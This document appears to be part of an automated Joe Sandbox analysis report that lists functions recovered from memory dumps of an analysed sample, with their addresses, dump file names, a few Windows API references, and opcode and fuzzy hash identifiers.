                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: 91e32cd8b777eec46f78acb79c634902dec0470084d609273aedb5344c0ed92b
                      • Instruction ID: a6c342d3de5abc8984d2818cc570bffa6e8a07aae18198443a87e10918da9ecd
                      • Opcode Fuzzy Hash: 91e32cd8b777eec46f78acb79c634902dec0470084d609273aedb5344c0ed92b
                      • Instruction Fuzzy Hash: 351103B5800349DFDB20CF9AD485BDEBFF4EB48310F10845AE959A3200C375A944CFA0
                      Function 02CD1A18 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                      Download Yara Rule
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 02CD1A7A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: d020091f2f6c89c0d38865d1daeeb096884601bac13b7077ae0374824adc4db4
                      • Instruction ID: fd037b9d0b10a2301a3d0a669e9d540d273f68ee76a13cfcb7458168428ed40e
                      • Opcode Fuzzy Hash: d020091f2f6c89c0d38865d1daeeb096884601bac13b7077ae0374824adc4db4
                      • Instruction Fuzzy Hash: 7C0104B18003498FEB24DFAAC5457AFBBF8AF49314F24841DD519A7244C7B8A684CBA5
                      Function 072F279F Relevance: .3, Instructions: 306COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c3b40d1b728bff03dfacd00f72ee4893d22ea98f7cf1471ea3b8fca43b333e0a
                      • Instruction ID: f0c25e34ea938b4dbf632f00f85b313925bceb81bad8da62b301e7b5a45875a4
                      • Opcode Fuzzy Hash: c3b40d1b728bff03dfacd00f72ee4893d22ea98f7cf1471ea3b8fca43b333e0a
                      • Instruction Fuzzy Hash: 58B19F35314B00CFC305EB78D454AEABBF2EF8A310B1489AAD15A8B361DB30ED45CB91
                      Function 072F2E16 Relevance: .3, Instructions: 263COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50d984df1c2196c32c9af3862bb171e47f803a3cdaffdba21845543011fdca22
                      • Instruction ID: bddb27bb9c6c3daf3b647f88c4cdcd00732a126d6fc5ce0038bc8651c13dab2a
                      • Opcode Fuzzy Hash: 50d984df1c2196c32c9af3862bb171e47f803a3cdaffdba21845543011fdca22
                      • Instruction Fuzzy Hash: C7A17E35314B008FC315EB78D854AEABBF2EF89310B5489AED15A8B361DF31AD45CB91
                      Function 072F2E56 Relevance: .2, Instructions: 249COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3ed5bf364ad9a059e58c96bc775114cd4a26aaa33a719e60aecbddf95ee11216
                      • Instruction ID: 1b9b991a0d4a766d59c60056488a84044ab6d4b7182f70ffa598309f33aded47
                      • Opcode Fuzzy Hash: 3ed5bf364ad9a059e58c96bc775114cd4a26aaa33a719e60aecbddf95ee11216
                      • Instruction Fuzzy Hash: 11916E35310B008FC305EB78D854AEAB7F2EF89311B5489AED15A8B361EF31AD45CB91
                      Function 072F3528 Relevance: .2, Instructions: 233COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: be7af91e9970f5cfd03c45bd2c84042c85d580a471cb3545dd97b884dd7dcf8b
                      • Instruction ID: 0bd9eb3dfe149656f92fb20b644a919209d2d839beb98db07dd9b85729083541
                      • Opcode Fuzzy Hash: be7af91e9970f5cfd03c45bd2c84042c85d580a471cb3545dd97b884dd7dcf8b
                      • Instruction Fuzzy Hash: 1A916175A002099FCB05DFA8D8809EEBBF5FF89300B14806AE904EB355EB35DD46CB91
                      Function 072F2EB0 Relevance: .2, Instructions: 196COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2b1882715ec8b6d36003e6e03c795f0397b842a5d898fd1cfac79ea40a168977
                      • Instruction ID: d0733691abd33cf28bc4850ac21f833aa666895853d345c17a92e56e57e9692c
                      • Opcode Fuzzy Hash: 2b1882715ec8b6d36003e6e03c795f0397b842a5d898fd1cfac79ea40a168977
                      • Instruction Fuzzy Hash: 8D812774310B048FC719EB78C894AAEB7E6EF89300B50896DD55A8B361EF31ED45CB91
                      Function 072F3B04 Relevance: .2, Instructions: 152COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bc043ff5801b232828668a255258fe043fc6047fe0e24b84f809884782a030e0
                      • Instruction ID: c4d815a4603493c4e159ce77725fc2102180d83e919be1b7ecec3ac19ac5176a
                      • Opcode Fuzzy Hash: bc043ff5801b232828668a255258fe043fc6047fe0e24b84f809884782a030e0
                      • Instruction Fuzzy Hash: 89417F71B102068FDB14DBB9D858AAEBBF6EFC4320B148929E519D7395DF309D058790
                      Function 072F3F41 Relevance: .1, Instructions: 138COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d06e5856fa79b6272149a441969e2f43bb0884c4d1d130e11021b0febf0f1a28
                      • Instruction ID: 5220c050b212b92ad2af136bc224af1277aa5ef6ce1378c0a25b1c8efbb52b4c
                      • Opcode Fuzzy Hash: d06e5856fa79b6272149a441969e2f43bb0884c4d1d130e11021b0febf0f1a28
                      • Instruction Fuzzy Hash: EC519034B502089FDB04DBB5D955B6EBBB3FF88700F249429EA06AB3A5DE75DC018B50
                      Function 072F4C87 Relevance: .1, Instructions: 138COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 06572594e21c54d205a755f2861dcb6f2a081bfddabf984cae5c0a1f575f4b8c
                      • Instruction ID: 8ea7d714c23279ff72d697859341361b47bd69cc08b483ff4802d6c5b8920224
                      • Opcode Fuzzy Hash: 06572594e21c54d205a755f2861dcb6f2a081bfddabf984cae5c0a1f575f4b8c
                      • Instruction Fuzzy Hash: 3A51EFB4919284DFC306DB69E554A99BFF0EF8A200F2A84D6D484CB3B3C7749D19C712
                      Function 072F3F7B Relevance: .1, Instructions: 136COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9f729594b7ab7140c55b9c71e644ae803a3779516d7328ad3c515ef55dd020a6
                      • Instruction ID: 46c800dcfb992bf4a7a7f9f3ff8f940f8b166526ad3b18c125fd9917af3d4636
                      • Opcode Fuzzy Hash: 9f729594b7ab7140c55b9c71e644ae803a3779516d7328ad3c515ef55dd020a6
                      • Instruction Fuzzy Hash: 4E419134B502089FDB049B75D955B6EBAB3FF88700F209469EA06AB3A5DE75DC018B50
                      Function 072FBA68 Relevance: .1, Instructions: 131COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69208b382907bc7091cb35e270950248a59948061229f20cf61c17f78855eb90
                      • Instruction ID: 9c924e7abb6143ca4274c92982e0b542a6a60be644aa985308e992bf8358b07d
                      • Opcode Fuzzy Hash: 69208b382907bc7091cb35e270950248a59948061229f20cf61c17f78855eb90
                      • Instruction Fuzzy Hash: B9414DF4E292198FDB08CBA9D4446EEFBF6EF8E301F149039E909A3255CB704941CB58
                      Function 072F4E3A Relevance: .1, Instructions: 123COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c85f162ed2bec2635ff60bbba75a69e6cdd49925f6459f46427d42114ec572f
                      • Instruction ID: 203b62244744de8141c8858bd320657a94177e3f79efb6bad3cea465b6c3f363
                      • Opcode Fuzzy Hash: 7c85f162ed2bec2635ff60bbba75a69e6cdd49925f6459f46427d42114ec572f
                      • Instruction Fuzzy Hash: C94126B497925ADFCB00EFA8D4849AEFBB4FB4E310F015965E61AA7311D7B09811CB60
                      Function 072FBDF8 Relevance: .1, Instructions: 123COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c55207f572fb3b2c6004189995fce961e6a1e32c7126e18b68bc0059c9ae12b6
                      • Instruction ID: d940a643bd60bd92c1437a0cc72e0dc72e286cceb0078cb4fef7f691565ab011
                      • Opcode Fuzzy Hash: c55207f572fb3b2c6004189995fce961e6a1e32c7126e18b68bc0059c9ae12b6
                      • Instruction Fuzzy Hash: 5841C6F4A24209CFDB04CFA9C584AEEF7F9BB89300F549165EA19A7351D7709941CF60
                      Function 072F4E48 Relevance: .1, Instructions: 117COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 00d59b8d3129cc22c697f89e73a7f9bcf4d8bedb72d26609bd381bbce593fd58
                      • Instruction ID: ddffc3ec0ca7012e10369ed113e619032e0433137fa34e5e5b5f54eb3d03941d
                      • Opcode Fuzzy Hash: 00d59b8d3129cc22c697f89e73a7f9bcf4d8bedb72d26609bd381bbce593fd58
                      • Instruction Fuzzy Hash: 5A41E7B4D3925ADFCB00EFA8D4849AEFBB4FB4E310F415965E61AA7311D7B09810CB60
                      Function 072F570B Relevance: .1, Instructions: 108COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6aadd649940960d35067f6d78de28a11a8ffaa6982f27bf86c3c45019d4439e2
                      • Instruction ID: 2aea9186c1287b80e3d27fee6ad0e079cb4ba0782051e3627a8941f0b56ee0fb
                      • Opcode Fuzzy Hash: 6aadd649940960d35067f6d78de28a11a8ffaa6982f27bf86c3c45019d4439e2
                      • Instruction Fuzzy Hash: 72419EB4E2521ADFDB44CFAAC984AEDFBF2BB09200F509425E416F7210D7349951CF14
                      Function 072F4FC6 Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bd01c6cdaa1ebe3bad7edc1ef1b3892cb216e2211cd5ca7d5996e52f1680ced3
                      • Instruction ID: c46a56b8209097d925befb5b54ff81bf41651cbcd8e6d056197993cf84427bc8
                      • Opcode Fuzzy Hash: bd01c6cdaa1ebe3bad7edc1ef1b3892cb216e2211cd5ca7d5996e52f1680ced3
                      • Instruction Fuzzy Hash: D741D2B4D3925ADFCB00EFA8E4849EEFBB4FB4E310F015965E61AA7211D7B09911CB14
                      Function 072F729C Relevance: .1, Instructions: 103COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fc8890a211224d7a5004843e4fe0e89d4cb79b7e319d57af184d0e1f97450f0f
                      • Instruction ID: 70ea054a581b4f9fab9e8f07b1e4e4869917f777b20168d8e86a33b8fc77d734
                      • Opcode Fuzzy Hash: fc8890a211224d7a5004843e4fe0e89d4cb79b7e319d57af184d0e1f97450f0f
                      • Instruction Fuzzy Hash: 91312870B243159BEB096BBC496833FA6EBDFC51907540839E606DB3C0ED28CC4283A6
                      Function 072F72D4 Relevance: .1, Instructions: 98COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bed717f2fdd977d99a00c3104858738fd6250d72823614499092eb75a10dfab5
                      • Instruction ID: 7f26346e023484e95613c0ea8c41de75d610f086abe3df4ac9816375908a259b
                      • Opcode Fuzzy Hash: bed717f2fdd977d99a00c3104858738fd6250d72823614499092eb75a10dfab5
                      • Instruction Fuzzy Hash: B83157B6910209EFDF10DFA9D884A9EBFF5EF48310F10842AE509A7310D774A940CBA4
                      Function 072F3518 Relevance: .1, Instructions: 97COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3a319f00ba4037e6edfbc6a1a95bf8e21a6e95fae1be4e8bffd5858922014370
                      • Instruction ID: 109ca58ff3d505e4b5b8844376b325f32747a1e6830639a3978d968a54ddb3b5
                      • Opcode Fuzzy Hash: 3a319f00ba4037e6edfbc6a1a95bf8e21a6e95fae1be4e8bffd5858922014370
                      • Instruction Fuzzy Hash: 563163756001098FDF05DF64C984AEEBBF2EF89300F1580AAE905AB366DB35ED05CB50
                      Function 072F0747 Relevance: .1, Instructions: 93COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 37c2e8d4aecc07ac496bfe04ec56dbbb702c5863a634188f9e09f033dfb8da05
                      • Instruction ID: df15386c8ec45bf50dc9c0f3d58b65bfa2a351d60dc379f364dac4dbb99e8c8e
                      • Opcode Fuzzy Hash: 37c2e8d4aecc07ac496bfe04ec56dbbb702c5863a634188f9e09f033dfb8da05
                      • Instruction Fuzzy Hash: 5731D2B5B203198FDB24DF68C8405AEBBF6EB88310F14C46AD506A7356DB74AD068FD0
                      Function 072FB2A8 Relevance: .1, Instructions: 92COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 134dd07ef70425ae651d1c46b7d411d0ce061e31ac4cf4689771e766577382b6
                      • Instruction ID: 53252d16440c07746ae0682ba31a00fb82b51339d5616adbffb7b3a28405c634
                      • Opcode Fuzzy Hash: 134dd07ef70425ae651d1c46b7d411d0ce061e31ac4cf4689771e766577382b6
                      • Instruction Fuzzy Hash: 2C31E7B4D28218CBDB08DFAAC9546AEFBB6BF8A300F149029D519AB354DB745905CB50
                      Function 072F323A Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 06cb9f6bae719eb0b742e09ea0f492a0ec36c121d3ba702e0f5dbea61620f2e0
                      • Instruction ID: 8d0e149fcd0b5acfaf774c95386f503a233cddda8b12da2d47c8bc9492db27d9
                      • Opcode Fuzzy Hash: 06cb9f6bae719eb0b742e09ea0f492a0ec36c121d3ba702e0f5dbea61620f2e0
                      • Instruction Fuzzy Hash: 2221A1317103258BD714DBA9D850BAFB7EAFFC8B10F10852AD918DB391DAB59C0283D1
                      Function 00FFD3D8 Relevance: .1, Instructions: 75COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328296626.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ffd000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5d176875e715d0c2c337db788be3255b6d91c3e0ab78102085c090529ab4074c
                      • Instruction ID: 960cfb84bd42b7efa0697ae5e8a2a3377ce439143aa7f78a0e9599857610a880
                      • Opcode Fuzzy Hash: 5d176875e715d0c2c337db788be3255b6d91c3e0ab78102085c090529ab4074c
                      • Instruction Fuzzy Hash: CC210A72504348DFDB05DF10D9C0B36BB66FF94324F24C569DA094B266C336E856EBA2
                      Function 00FFD4C4 Relevance: .1, Instructions: 75COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328296626.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ffd000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3a181c0998d3e817f139f1bd5a15f13b0e3febf27b8a951483617feabb1df032
                      • Instruction ID: 669ebd6077741d37addbf81e3b0f6f9092f492723b8898357df5d5578382f167
                      • Opcode Fuzzy Hash: 3a181c0998d3e817f139f1bd5a15f13b0e3febf27b8a951483617feabb1df032
                      • Instruction Fuzzy Hash: 0521F872904248DFDB15DF14D9C0B36BF66FF84328F28C569DA050B266C336D856EBA2
                      Function 0100D1D4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328345776.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_100d000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04af2f66017fe16e2f9f5f939cbe75cad4d98c99ff90ce33dd36999390da9553
                      • Instruction ID: 617376435011b715b9a05f79fd461c6efa5e4c4ce346ea8b4a37c10d3e37608b
                      • Opcode Fuzzy Hash: 04af2f66017fe16e2f9f5f939cbe75cad4d98c99ff90ce33dd36999390da9553
                      • Instruction Fuzzy Hash: 7921D371504344EFEB06DF94D5C0B29BBA5FB94324F24C5ADE8894B292C736D446CB72
                      Function 0100D01C Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328345776.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_100d000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ff01ad56f1e7759bf29e870b48c7c2348579480020ba6cbf0e671a7d93f0110d
                      • Instruction ID: 1ad5a9672735f970168b7b0fa94aa25571302d1fedc70612ea3ee96c7de43a7e
                      • Opcode Fuzzy Hash: ff01ad56f1e7759bf29e870b48c7c2348579480020ba6cbf0e671a7d93f0110d
                      • Instruction Fuzzy Hash: BA21D371604344DFEB16DF94D9C0B16BBA5EB84314F24C5A9E98E4B286C336D447CB72
                      Function 072F726C Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01bc8c387e7ddfc4c81911679c3c5ea684972f4f5861c162a21e9747737f59d9
                      • Instruction ID: d821dbec99d79a02626c952b14842a1b25512fa18e501503e291435c185ea6db
                      • Opcode Fuzzy Hash: 01bc8c387e7ddfc4c81911679c3c5ea684972f4f5861c162a21e9747737f59d9
                      • Instruction Fuzzy Hash: 9A11E1B1A693449FDB09CB748D5A76EBBF4DB42210B1849BAE605CB3D2DA34CD058352
                      Function 072F3170 Relevance: .1, Instructions: 70COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 52d6d352bfda5f1e6b075986861d4dbb99748ea955c72e2cd54c726dd3e1f4d7
                      • Instruction ID: 44c86318352c602ecd79bad5a0e27e55b661897e3e87ad26c968ecd30651ab86
                      • Opcode Fuzzy Hash: 52d6d352bfda5f1e6b075986861d4dbb99748ea955c72e2cd54c726dd3e1f4d7
                      • Instruction Fuzzy Hash: AD2168B5A007158FC720CF64D880ABBB7F9FF89700B11896DE959DB320E774A905CBA0
                      Function 072F6FEA Relevance: .1, Instructions: 68COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 123eba285b6003c2a58c34867e8a90142756adc3ecbc5f3806d1ce08044d7262
                      • Instruction ID: bc22ab9f4d36edd65ad58502e39eb305ac365a9688867fcf84f49ad6c6faf48f
                      • Opcode Fuzzy Hash: 123eba285b6003c2a58c34867e8a90142756adc3ecbc5f3806d1ce08044d7262
                      • Instruction Fuzzy Hash: 762193B160021A9FE714CF5AC844BAAFBF5FB88370F248279E515DB290CB759945CBA0
                      Function 072F3CA4 Relevance: .1, Instructions: 67COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1b5550481f113ec4ee61861ac08d8ed0d138e895d6e06b91eeab33d3c10f5ad6
                      • Instruction ID: fe99f7a544e96b321a83a18d0b9a6fbe9824d847e978ccab8e192e5afaa680ad
                      • Opcode Fuzzy Hash: 1b5550481f113ec4ee61861ac08d8ed0d138e895d6e06b91eeab33d3c10f5ad6
                      • Instruction Fuzzy Hash: 2431C0B0C11359DFDB20DF9AD588B8EBBF4EB08714F24846AE548BB240C7B55845CFA5
                      Function 072F6B8E Relevance: .1, Instructions: 67COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6fae903f31fbf8ccae211aa55d0566af49f6ba878a2ad92840bb39f3220a64a
                      • Instruction ID: 40e6a3ec9ab5fab8ff580f39a9bf989f5a1e53165237340721bbe969ccd560cd
                      • Opcode Fuzzy Hash: d6fae903f31fbf8ccae211aa55d0566af49f6ba878a2ad92840bb39f3220a64a
                      • Instruction Fuzzy Hash: 3521C0B4C11319DFDB20CF99D589B8EBBF4EB08714F24846AE448BB250C7B55845CFA4
                      Function 072F3180 Relevance: .1, Instructions: 66COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 564b519fe95c69277f7172dfd185d8a8cabdb52ab7c86ba6260ccc58c365d1e0
                      • Instruction ID: 49a37a5211c411d36142b879e4e0a10694ba85111279afde9b67fa513bd68f32
                      • Opcode Fuzzy Hash: 564b519fe95c69277f7172dfd185d8a8cabdb52ab7c86ba6260ccc58c365d1e0
                      • Instruction Fuzzy Hash: CF2167756007159BC320CF69C8809BBB7FAFF89700B41892DE9199B320E770ED05CBA0
                      Function 072F4D70 Relevance: .1, Instructions: 61COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 381638f1544abb2ad10bb5294ede4f8303eb971444560dfe67c21c39d152ebb8
                      • Instruction ID: d63347781b0a0795a9ac9a046ae7260a3796df9660053108b8c2efa736a55c2a
                      • Opcode Fuzzy Hash: 381638f1544abb2ad10bb5294ede4f8303eb971444560dfe67c21c39d152ebb8
                      • Instruction Fuzzy Hash: 6221B3B4A10908DFD708DF5AE684999BBF5FF8D300B6290D5E4489B366DB71EE21DB00
                      Function 072F69D8 Relevance: .1, Instructions: 61COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
